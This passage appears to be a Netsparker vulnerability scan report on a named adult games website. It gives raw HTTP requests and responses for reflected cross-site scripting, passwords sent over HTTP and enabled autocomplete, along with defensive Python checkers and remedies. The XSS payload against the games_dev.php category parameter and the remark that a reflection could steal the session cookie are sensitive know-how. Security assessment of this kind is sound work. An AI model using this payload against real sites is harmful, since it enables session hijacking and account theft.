Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option 
value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option 
value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option> <option value="TC">Turks &amp; Caicos Islands</option> <option value="TV">Tuvalu</option> <option value="UG">Uganda</option> <option value="UA">Ukraine</option> <option value="AE">United Arab Emirates</option> <option value="US">United States&l..
- /games_dev.php

/games_dev.php

http://www.lessonofpassion.com/games_dev.php?type=category&category='%22--%3E%3C/style%3E%3C/script%..

Parameters

Parameter   Type   Value
type        GET    category
category    GET    '"--></style></script><script>alert(0x000103)</script>

Request

GET /games_dev.php?type=category&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000103)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2174
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x000103)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div 
class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" 
border="0"></a></center></div><div id="sitecontent"> <div class="big"> games</div> <center><div class="clearfix"> </div><center> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
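Both reflections quoted in this report, the emailx value in the user.php registration form and the category parameter in the games_dev.php title, came back with the quotes backslash-escaped but the angle brackets untouched. A backslash before a quote is what SQL-style escaping such as PHP's addslashes() produces; HTML does not treat a backslash specially, so the injected `</script><script>` still lands in markup and the reflection is live. The following Python, added here as an example and not part of the Netsparker report or the site's code, classifies a reflection by that criterion and shows what the title would have looked like with proper entity encoding. The sample bodies are constructed from the response fragments above.

```python
import html
import re

# Constructed samples, taken from the two responses quoted in this report:
# the <title> of games_dev.php and the emailx input of the user.php
# registration form. In both, the quotes came back backslash-escaped
# but the angle brackets were left alone.
TITLE_REFLECTION = (
    '<title>Lesson of Passion - \\\'\\"--></style></script>'
    '<script>netsparker(0x000103)</script> erotic flash games</title>'
)
ATTRIBUTE_REFLECTION = (
    '<INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" '
    'value = "\\\'\\"--></style></script><script>netsparker(0x000390)</script>">'
)

# The value Netsparker sent for the category parameter (URL-decoded).
PAYLOAD = '\'"--></style></script><script>netsparker(0x000103)</script>'


def classify_reflection(body: str, marker: str) -> dict:
    """Find the scanner marker in a response body and report how it came back.

    found          - the marker text is present
    tags_raw       - the marker sits inside a literal <script>...</script>
                     element, i.e. '<' and '>' were not entity-encoded and
                     the injected markup is live
    quotes_escaped - a backslash precedes a quote next to the marker: the
                     application applied SQL-style escaping (addslashes-like)
                     rather than HTML encoding, which does not stop XSS
    """
    idx = body.find(marker)
    if idx == -1:
        return {"found": False, "tags_raw": False, "quotes_escaped": False}
    window = body[max(0, idx - 80): idx + len(marker) + 20]
    live = re.search(r"<script>\s*" + re.escape(marker) + r"\s*</script>", window)
    return {
        "found": True,
        "tags_raw": live is not None,
        "quotes_escaped": ("\\'" in window) or ('\\"' in window),
    }


def render_title_safely(category: str) -> str:
    """The output the server should have produced: entity-encode the
    parameter before placing it in the <title> (the equivalent of PHP's
    htmlspecialchars($category, ENT_QUOTES, 'UTF-8'))."""
    return ("<title>Lesson of Passion - " + html.escape(category, quote=True)
            + " erotic flash games</title>")


if __name__ == "__main__":
    for name, body, marker in [
        ("games_dev.php title", TITLE_REFLECTION, "netsparker(0x000103)"),
        ("user.php emailx attribute", ATTRIBUTE_REFLECTION, "netsparker(0x000390)"),
        ("encoded title", render_title_safely(PAYLOAD), "netsparker(0x000103)"),
    ]:
        print(name, classify_reflection(body, marker))
```

When confirming a scanner hit manually, look at the raw response rather than the rendered page: a reflection that appears "escaped" because quotes carry backslashes is still exploitable wherever the angle brackets survive, as both responses here show.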
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic (on the user's LAN, at a hotspot, or anywhere on the path to the server), they can read the credentials in the clear and, since the session cookie is also set over HTTP, the session identifier as well.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS, meaning both the page that renders the form and the form's action target: a login form delivered over HTTP can be rewritten in transit even if its action points at an HTTPS URL. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS. Once that is in place, set the Secure flag on the session cookie so it is never sent over plain HTTP, and send a Strict-Transport-Security header so browsers do not fall back to HTTP.
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Form target action

user.php?type=login

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br 
/><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player 
registration</span><br /><br />Welcome to Lesson of Passion CLUB.<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = ""><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = ""><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = ""><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = ""><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option 
value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option 
value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option 
value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> <option value="ST">Sao Tome And Principe</option> <option value="SA">Saudi Arabia</option> <option value="XE">Scotland</option> <option value="SN">Senegal</option> <option value="XF">Serbia</option> <option value="SC">Seychelles</option> <option value="SL">Sierra Leone</option> <option value="SG">Singapore</option> <option value="SK">Slovakia</option> <option value="SI">Slovenia</option> <option value="SB">Solomon Islands</option> <option value="SO">Somalia</option> <option 
value="ZA">South Africa</option> <option value="KR">South Korea</option> <option value="ES">Spain</option> <option value="LK">Sri Lanka</option> <option value="SD">Sudan</option> <option value="SR">Surinam</option> <option value="SZ">Swaziland</option> <option value="SE">Sweden</option> <option value="CH">Switzerland</option> <option value="SY">Syria</option> <option value="TW">Taiwan</option> <option value="TJ">Tajikistan</option> <option value="TZ">Tanzania</option> <option value="TH">Thailand</option> <option value="XG">Tobago</option> <option value="TG">Togo</option> <option value="TK">Tokelau</option> <option value="TO">Tonga</option> <option value="TT">Trinidad And Tobago</option> <option value="XH">Tristan Da Cunha</option> <option value="TN">Tunisia</option> <option value="TR">Turkey</option> <option value="TM">Turkmenistan</option>..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields may be stored by the browser's form-autofill or password store. An attacker who can access the victim's browser could retrieve this information. This is especially important if the application is commonly used on shared computers such as those in cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields. Treat this as defence in depth rather than a complete fix: current browsers' password managers ignore autocomplete="off" on login password fields and will offer to save the credential anyway, so the finding is really about not leaving secrets in browser storage on shared machines, which only HTTPS plus user education addresses fully.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and a number of automated tools exist to do it. Where the attacker cannot dump the data, they could still browse the recently visited websites and trigger the auto-complete feature to see previously entered values.
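The Password Transmitted Over HTTP finding and this Auto Complete finding come from the same /user.php?type=register response, and both are properties of the form markup that can be checked offline. The following Python is an added example, not part of the Netsparker report or the site's code: it parses the two forms from that response (reproduced as a constructed sample with the page layout stripped), resolves each form's action against the page URL, and flags password fields that are posted from or to a non-HTTPS URL, that lack autocomplete="off", or that are rendered as type="text" (as the registration form's passwordx and password2x fields are, which the scanner did not call out). It also checks the Set-Cookie header quoted above for the Secure and HttpOnly flags, since a session cookie set over HTTP without Secure is exposed by the same interception the finding describes.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the login form and the registration form from the
# /user.php?type=register response quoted in this report, with the page
# layout around them stripped. The page itself was served over plain HTTP.
PAGE_URL = "http://www.lessonofpassion.com/user.php?type=register"
PAGE_HTML = """
<FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login">
<B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">
<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">
<input name="imageField" type="image" src="but_login.png"></FORM>
<FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser">
<INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value="">
<INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value="">
<INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value="">
<INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value=""></FORM>
"""
# Constructed sample: the Set-Cookie header from the same response.
SET_COOKIE = "PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/"


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the <input>s inside it.
    HTMLParser lower-cases tag and attribute names, so the upper-case
    markup in the response parses the same as lower-case."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "name": a.get("name") or "",
                "type": (a.get("type") or "text").lower(),
                "autocomplete": (a.get("autocomplete") or "").lower(),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_secret_field(inp):
    """A password input, or a text input whose name says it holds a password."""
    return inp["type"] == "password" or "pass" in inp["name"].lower()


def audit_forms(page_url, page_html):
    """Return (finding, detail) pairs for every form that carries a secret.

    password_over_http       - the page or the resolved form action is not https
    password_field_unmasked  - a password-named field is rendered as type=text
    autocomplete_enabled     - a secret field lacks autocomplete="off"
    """
    parser = FormCollector()
    parser.feed(page_html)
    findings = []
    page_is_tls = urlsplit(page_url).scheme == "https"
    for form in parser.forms:
        # An empty action posts back to the page's own URL.
        target = urljoin(page_url, form["action"])
        secrets = [i for i in form["inputs"] if is_secret_field(i)]
        if not secrets:
            continue
        if not page_is_tls or urlsplit(target).scheme != "https":
            findings.append(("password_over_http", target))
        for inp in secrets:
            if inp["type"] != "password":
                findings.append(("password_field_unmasked", inp["name"]))
            if inp["autocomplete"] != "off":
                findings.append(("autocomplete_enabled", inp["name"]))
    return findings


def missing_cookie_flags(set_cookie):
    """Names of the Secure / HttpOnly attributes absent from a Set-Cookie value."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    return [flag for flag in ("secure", "httponly") if flag not in attrs]


if __name__ == "__main__":
    for finding in audit_forms(PAGE_URL, PAGE_HTML):
        print(*finding)
    print("session cookie missing:", missing_cookie_flags(SET_COOKIE))
```

The check flags on the page scheme as well as the action scheme, because an HTTP-served form is interceptable regardless of where it posts. The missing HttpOnly flag matters together with the XSS findings earlier in this report: any of those reflections can read document.cookie and lift the PHPSESSID value.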

External References

- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Identified Field Name

password

Request

GET /user.php?type=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 19:59:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3988a8169a488a5762f12272eaa0f2d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4436
Content-Type: text/html


(Response body identical to the /user.php?type=register response shown under Password Transmitted Over HTTP above. The field this finding refers to is the login form's <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">; note that the registration form on the same page renders its passwordx and password2x fields as TYPE="text".)
value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option 
